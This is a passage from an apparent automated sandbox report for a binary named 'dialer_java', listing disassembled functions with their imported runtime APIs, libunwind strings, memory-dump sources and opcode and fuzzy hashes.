Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
API String ID: 1137233558-227906034
Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction ID: e2f168253bf180122d0dc237ff5f9e3527f5de8d600965d1fab17c52087c5847
Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction Fuzzy Hash: D1011E13F1A69741FB14571EB81A3783E985F66B80F054436C94EB33A1DD1E6586830B

Function 00007FF6E3A687F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A68814
fflush.MSVCRT ref: 00007FF6E3A68856

Strings

libunwind: __unw_step(cursor=%p), xrefs: 00007FF6E3A6883A
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A6880D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_step(cursor=%p)
API String ID: 1137233558-3760164396
Opcode ID: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction ID: 2f21292b334f6489d2f1246af0ff6dec6df1df2cba9906345962fd24e3017cfe
Opcode Fuzzy Hash: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction Fuzzy Hash: BD018402F1D29641F7049B1EE8073B43E985F66BD0F04403AC94EB3391DD6E64C2830B

Function 00007FF6E3A63ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6E3A63F11
RaiseException.KERNEL32(?,?,?,00000030,00007FF6E3A62F54), ref: 00007FF6E3A63F37

Strings

libunwind: _Unwind_RaiseException(ex_obj=%p), xrefs: 00007FF6E3A63EF5
CCG , xrefs: 00007FF6E3A63F2A

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: ExceptionRaisefflush
String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
API String ID: 3404444629-1152080672
Opcode ID: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction ID: 9d0e213918cccc13cb8dffc831a78c711de4546ab1db506f21860036dbc068a9
Opcode Fuzzy Hash: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction Fuzzy Hash: B9F02811F1869142F624AB6EB5063F46775AF847C1F004135EE4D63791EE2F96C28305

Function 00007FF6E3A62C20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6E3A62C46
GetProcAddress.KERNEL32 ref: 00007FF6E3A62C56

Strings

msvcrt.dll, xrefs: 00007FF6E3A62C3F
_localtime64_s, xrefs: 00007FF6E3A62C4C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction ID: d269f188a5653826cb3e2184c4525615ede228f3f6ce11ac4faadc592d097a0b
Opcode Fuzzy Hash: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction Fuzzy Hash: 8FF03A62B0AA4290EE05CF0EFC5A2B03B61AF54BC1F404476DC4DA3360EE2FA5C98306

Function 00007FF6E3A62BB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6E3A62BD6
GetProcAddress.KERNEL32 ref: 00007FF6E3A62BE6

Strings

msvcrt.dll, xrefs: 00007FF6E3A62BCF
_localtime64_s, xrefs: 00007FF6E3A62BDC

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction ID: f6a03e378adf85ce4f6914a31b6c9b127b846b4484feaccdadc10b6122d4697d
Opcode Fuzzy Hash: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction Fuzzy Hash: 11F03A62B0AA4290EE04CF0EFC5A2B03B61AF54BC1F404476DC4DE3360EE2FA5C98306

Function 00007FF6E3A82710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6E3A8271B
GetProcAddress.KERNEL32 ref: 00007FF6E3A8272B

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00007FF6E3A82721
kernel32.dll, xrefs: 00007FF6E3A82714

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 1646373207-706389432
Opcode ID: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction ID: 7c837c848510dd4a204718ffa55a4fdc73e12da4151e062c2741d225fafda243
Opcode Fuzzy Hash: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction Fuzzy Hash: 2EE0EC26F0AA43C0EA44DF19F84A2302BA06F65744F800479C80DB7320EF2FA0CA830A

Function 00007FF6E3A82CD0 Relevance: 6.4, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A82D71
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A82DAA
free.MSVCRT ref: 00007FF6E3A82E1D
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A82E46

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: CriticalLeaveSection$free
String ID:
API String ID: 2017658852-0
Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction ID: 494b866244919c33685a64f1a182bdf59909f9b0cccfbca76320643a01bf0d1f
Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction Fuzzy Hash: EE518D23B0968780FB54AF09A95A3757FA2AF59784F080435C94EA7790DE3EE4C0C34A

Function 00007FF6E3A6DC20 Relevance: 6.4, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF6E3A6DC93
memcpy.MSVCRT ref: 00007FF6E3A6DCC4
free.MSVCRT ref: 00007FF6E3A6DD7E
memcpy.MSVCRT ref: 00007FF6E3A6DDAF
free.MSVCRT ref: 00007FF6E3A6DDF8

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: free$memcpy
String ID:
API String ID: 4107583993-0
Opcode ID: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction ID: 5ea942080f0196aaef978f646be1c9a3aa4628553af34c280adcca3a92318ecf
Opcode Fuzzy Hash: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction Fuzzy Hash: 9D513773616B91C6DA60CB1AF5896AEB7A8F7447C4F114235CB9E93B60EF39E0D18301

Function 00007FF6E3A6ABE0 Relevance: 6.3, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF6E3A6AC20
free.MSVCRT ref: 00007FF6E3A6AC38
free.MSVCRT ref: 00007FF6E3A6AC50
free.MSVCRT ref: 00007FF6E3A6AC68
free.MSVCRT ref: 00007FF6E3A6ACAB

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction ID: caee6bb8c66f527d8b01885b10034ce6abbb2d57fe420e63c792cc538349cd6d
Opcode Fuzzy Hash: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction Fuzzy Hash: 7111A567B1A58642DF699A5DE09A3FE6754EF84780F000031DB6FA7790DE2EE5C2C305

Function 00007FF6E3A6D5C0 Relevance: 6.3, APIs: 4, Instructions: 273COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A6D703
memcpy.MSVCRT ref: 00007FF6E3A6D722
malloc.MSVCRT ref: 00007FF6E3A6D7C0

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$memcpy
String ID:
API String ID: 3800483350-0
Opcode ID: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction ID: b2e49e1603042423a75ac2da64ecb164eb90f20b8d2729569a0feac8d8333136
Opcode Fuzzy Hash: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction Fuzzy Hash: 33A1F123B1AA8245EA718B1DE8413797BD1AB45BD0F084132CE8D97794EF7DE4C2C30A

Function 00007FF6E3A664F0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A665A4

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction ID: 3ee7316f26603853003cb309757d0b0eafe53b4275d802af6fa64fc695da9763
Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction Fuzzy Hash: 5F91F8B7B2424287E7388E1EE1527797B91EB14794F018135CB5AD3BA0DE3EF4808B05

Function 00007FF6E3A80F70 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A81024

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction ID: ef690c0a627d27c3d45c4627eb48853fbbcce6d7d3a61e8f689feb05ed7cd144
Opcode Fuzzy Hash: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction Fuzzy Hash: 5C91C173B042C68BF7348A2ED54A7797AA1EB14794F048139CB5AE7B81DE2EF4C18705

Function 00007FF6E3A7F3D0 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7F46E
realloc.MSVCRT ref: 00007FF6E3A7F4B5
realloc.MSVCRT ref: 00007FF6E3A7F532
realloc.MSVCRT ref: 00007FF6E3A7F5ED

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction ID: 726ffcf59b4d1afa19b2c63eef48eb9c0e379a9756456fb1d6c06471af7a7c38
Opcode Fuzzy Hash: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction Fuzzy Hash: FE7195A7B05B4583DE248F1AE4852796BA1EF59FC0F108432CB8E577A4DF2ED582C305

Function 00007FF6E3A797B0 Relevance: 6.2, APIs: 4, Instructions: 163COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A797F3
realloc.MSVCRT ref: 00007FF6E3A79874
realloc.MSVCRT ref: 00007FF6E3A798B4
realloc.MSVCRT ref: 00007FF6E3A79943

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction ID: ed5b973521df92ccdadf8865cc3337f5274aedf00b40ffdfa04dc912bd4f3b12
Opcode Fuzzy Hash: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction Fuzzy Hash: BD51A1B3B05B8582EF258F1AE4953697B61EB99F84F048132CB8E573A4DF2DD086C305

Function 00007FF6E3A799D0 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A79A09
realloc.MSVCRT ref: 00007FF6E3A79A8A
realloc.MSVCRT ref: 00007FF6E3A79B10
realloc.MSVCRT ref: 00007FF6E3A79B6B

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction ID: 3ecb5f7bba178dd3fa0020d7b30d96386548b9fd0dc58535b13226c4568cec88
Opcode Fuzzy Hash: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction Fuzzy Hash: 47518FB3A05B8582DF258F1AE4953697B61EB99FC4B048132CB9E477A4DF3DD086C305

Function 00007FF6E3A6E7E0 Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A6E929

Part of subcall function 00007FF6E3A6EC60: malloc.MSVCRT ref: 00007FF6E3A6ED36

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction ID: c8b4fc7f911a8e0cbc2e8c0e8dd4db0bfdb28d4c799802f40c27d008fc28d5d6
Opcode Fuzzy Hash: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction Fuzzy Hash: 8551023372AB8295EA558B1DD646BB97B94BF44B80F054931CF9C9B380EF39E4A1C305

Function 00007FF6E3A70720 Relevance: 6.1, APIs: 4, Instructions: 135stringCOMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A70756
malloc.MSVCRT ref: 00007FF6E3A7076B
malloc.MSVCRT ref: 00007FF6E3A707FE
strlen.MSVCRT ref: 00007FF6E3A70833

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
